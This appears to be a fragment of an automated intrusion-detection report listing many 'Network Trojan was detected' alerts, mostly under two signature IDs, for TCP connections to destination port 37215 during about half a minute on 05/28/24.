                  SID:2829579
                  Source Port:57086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319464
                  SID:2829579
                  Source Port:44816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907882
                  SID:2829579
                  Source Port:38176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.591043
                  SID:2829579
                  Source Port:57282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628578
                  SID:2835222
                  Source Port:50668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490201
                  SID:2829579
                  Source Port:48924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528233
                  SID:2829579
                  Source Port:33290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.661905
                  SID:2835222
                  Source Port:43542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.874528
                  SID:2835222
                  Source Port:58844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695777
                  SID:2835222
                  Source Port:37256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.804068
                  SID:2829579
                  Source Port:42626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651194
                  SID:2829579
                  Source Port:48312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579627
                  SID:2829579
                  Source Port:35194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.795495
                  SID:2835222
                  Source Port:49394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649738
                  SID:2835222
                  Source Port:50848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584668
                  SID:2835222
                  Source Port:59002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546525
                  SID:2829579
                  Source Port:59620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695722
                  SID:2829579
                  Source Port:50282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629254
                  SID:2829579
                  Source Port:35830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.770860
                  SID:2835222
                  Source Port:52466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769836
                  SID:2835222
                  Source Port:49880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578898
                  SID:2835222
                  Source Port:44904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661674
                  SID:2829579
                  Source Port:48458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.669616
                  SID:2835222
                  Source Port:37200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576825
                  SID:2829579
                  Source Port:56254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530960
                  SID:2829579
                  Source Port:39728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843665
                  SID:2835222
                  Source Port:40294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.294543
                  SID:2829579
                  Source Port:48170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.622241
                  SID:2835222
                  Source Port:57604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.544244
                  SID:2835222
                  Source Port:53016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.804068
                  SID:2829579
                  Source Port:38872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.849038
                  SID:2835222
                  Source Port:48482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.487976
                  SID:2835222
                  Source Port:41768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.890815
                  SID:2835222
                  Source Port:52396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.918153
                  SID:2835222
                  Source Port:32822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886788
                  SID:2835222
                  Source Port:57718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543418
                  SID:2829579
                  Source Port:43804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.551953
                  SID:2829579
                  Source Port:48512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.483002
                  SID:2829579
                  Source Port:47026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887306
                  SID:2835222
                  Source Port:60302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585425
                  SID:2835222
                  Source Port:41152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628148
                  SID:2835222
                  Source Port:35630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846636
                  SID:2835222
                  Source Port:43582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490418
                  SID:2835222
                  Source Port:33092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.652043
                  SID:2835222
                  Source Port:54464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530873
                  SID:2829579
                  Source Port:36652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790957
                  SID:2829579
                  Source Port:36048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795740
                  SID:2835222
                  Source Port:54082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.885415
                  SID:2835222
                  Source Port:45180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930146
                  SID:2835222
                  Source Port:55720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494616
                  SID:2835222
                  Source Port:59992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496206
                  SID:2835222
                  Source Port:42618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629164
                  SID:2829579
                  Source Port:57926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.669616
                  SID:2835222
                  Source Port:48658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.585323
                  SID:2829579
                  Source Port:43156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493576
                  SID:2835222
                  Source Port:47844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488075
                  SID:2829579
                  Source Port:42542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.587047
                  SID:2829579
                  Source Port:40826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.318981
                  SID:2829579
                  Source Port:55334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930166
                  SID:2829579
                  Source Port:57122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489338
                  SID:2835222
                  Source Port:56580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.585624
                  SID:2835222
                  Source Port:40098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.860114
                  SID:2829579
                  Source Port:57294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719074
                  SID:2835222
                  Source Port:40400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.487967
                  SID:2835222
                  Source Port:40802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576365
                  SID:2829579
                  Source Port:32996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789441
                  SID:2835222
                  Source Port:41650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.870837
                  SID:2829579
                  Source Port:38810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.786358
                  SID:2829579
                  Source Port:51724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583390
                  SID:2829579
                  Source Port:35708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628018
                  SID:2835222
                  Source Port:36374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795415
                  SID:2835222
                  Source Port:33500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790058
                  SID:2829579
                  Source Port:39834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.660557
                  SID:2835222
                  Source Port:52006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906950
                  SID:2829579
                  Source Port:48486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.545047
                  SID:2835222
                  Source Port:36726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908608
                  SID:2835222
                  Source Port:46774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695244
                  SID:2835222
                  Source Port:35136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.548281
                  SID:2835222
                  Source Port:57960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.483047
                  SID:2835222
                  Source Port:56530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.598214
                  SID:2835222
                  Source Port:35294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.595892
                  SID:2835222
                  Source Port:58762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.684208
                  SID:2835222
                  Source Port:40934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496794
                  SID:2829579
                  Source Port:57156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660439
                  SID:2835222
                  Source Port:60046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.673893
                  SID:2835222
                  Source Port:36546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555130
                  SID:2835222
                  Source Port:47630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.683158
                  SID:2829579
                  Source Port:58542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651258
                  SID:2835222
                  Source Port:58416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769373
                  SID:2829579
                  Source Port:45146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.920880
                  SID:2835222
                  Source Port:42194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.606652
                  SID:2835222
                  Source Port:34510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696382
                  SID:2829579
                  Source Port:48548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.694948
                  SID:2829579
                  Source Port:35580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742662
                  SID:2829579
                  Source Port:37546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.371891
                  SID:2835222
                  Source Port:58032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.781233
                  SID:2829579
                  Source Port:38990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543704
                  SID:2829579
                  Source Port:52904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766769
                  SID:2829579
                  Source Port:40900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.548215
                  SID:2829579
                  Source Port:54100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742324
                  SID:2829579
                  Source Port:56436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.785653
                  SID:2835222
                  Source Port:39574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537179
                  SID:2829579
                  Source Port:47182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888394
                  SID:2835222
                  Source Port:37424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920075
                  SID:2835222
                  Source Port:55364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661207
                  SID:2829579
                  Source Port:55570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530606
                  SID:2835222
                  Source Port:37826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629645
                  SID:2829579
                  Source Port:42640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846738
                  SID:2835222
                  Source Port:47928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.802768
                  SID:2835222
                  Source Port:47792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.323448
                  SID:2835222
                  Source Port:47120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279383
                  SID:2829579
                  Source Port:45174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650345
                  SID:2829579
                  Source Port:60866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719444
                  SID:2835222
                  Source Port:39668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576812
                  SID:2829579
                  Source Port:59134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.750009
                  SID:2835222
                  Source Port:41536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912852
                  SID:2829579
                  Source Port:39512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.809977
                  SID:2835222
                  Source Port:39514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908030
                  SID:2835222
                  Source Port:53216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586417
                  SID:2835222
                  Source Port:46702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788958
                  SID:2829579
                  Source Port:37100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.491397
                  SID:2829579
                  Source Port:55146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.942584
                  SID:2829579
                  Source Port:48292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584136
                  SID:2829579
                  Source Port:52996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.487952
                  SID:2835222
                  Source Port:48590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.864881
                  SID:2829579
                  Source Port:46154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923110
                  SID:2835222
                  Source Port:41482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.298070
                  SID:2835222
                  Source Port:36634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798172
                  SID:2829579
                  Source Port:53146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278210
                  SID:2829579
                  Source Port:47134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768545
                  SID:2835222
                  Source Port:34728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529986
                  SID:2835222
                  Source Port:44930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737853
                  SID:2829579
                  Source Port:34336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.545901
                  SID:2829579
                  Source Port:36584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.594948
                  SID:2829579
                  Source Port:43258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.915656
                  SID:2835222
                  Source Port:45376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791641
                  SID:2829579
                  Source Port:40160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.870950
                  SID:2835222
                  Source Port:53900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.551016
                  SID:2835222
                  Source Port:36758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.487858
                  SID:2829579
                  Source Port:46520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.655632
                  SID:2835222
                  Source Port:46004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.872235
                  SID:2835222
                  Source Port:48852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.817742
                  SID:2835222
                  Source Port:35596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.849050
                  SID:2829579
                  Source Port:37082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.495856
                  SID:2829579
                  Source Port:53902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546804
                  SID:2835222
                  Source Port:49550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.491414
                  SID:2829579
                  Source Port:56500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661372
                  SID:2835222
                  Source Port:37718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.837156
                  SID:2829579
                  Source Port:57282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887961
                  SID:2829579
                  Source Port:40756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276816
                  SID:2829579
                  Source Port:59238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537015
                  SID:2835222
                  Source Port:45926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651356
                  SID:2829579
                  Source Port:41896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583511
                  SID:2835222
                  Source Port:55886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660623
                  SID:2835222
                  Source Port:52480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.799394
                  SID:2835222
                  Source Port:36502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.495960
                  SID:2835222
                  Source Port:35550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578626
                  SID:2829579
                  Source Port:39006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.589981
                  SID:2829579
                  Source Port:45768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.297591
                  SID:2829579
                  Source Port:52068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.792552
                  SID:2835222
                  Source Port:43490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920826
                  SID:2829579
                  Source Port:40998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576093
                  SID:2835222
                  Source Port:45180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845223
                  SID:2829579
                  Source Port:33346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:28.922740
                  SID:2835222
                  Source Port:34116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910934
                  SID:2829579
                  Source Port:51712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494869
                  SID:2835222
                  Source Port:43332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768635
                  SID:2835222
                  Source Port:34996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585288
                  SID:2835222
                  Source Port:42950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586445
                  SID:2835222
                  Source Port:32830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769287
                  SID:2835222
                  Source Port:56230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527587
                  SID:2829579
                  Source Port:39728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.563541
                  SID:2829579
                  Source Port:37584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660430
                  SID:2835222
                  Source Port:42658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.775973
                  SID:2835222
                  Source Port:46858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910614
                  SID:2835222
                  Source Port:43280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489867
                  SID:2829579
                  Source Port:59774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555670
                  SID:2829579
                  Source Port:58868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695118
                  SID:2829579
                  Source Port:57630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488721
                  SID:2829579
                  Source Port:55242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.606788
                  SID:2829579
                  Source Port:42572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278452
                  SID:2829579
                  Source Port:45418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536755
                  SID:2829579
                  Source Port:34804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
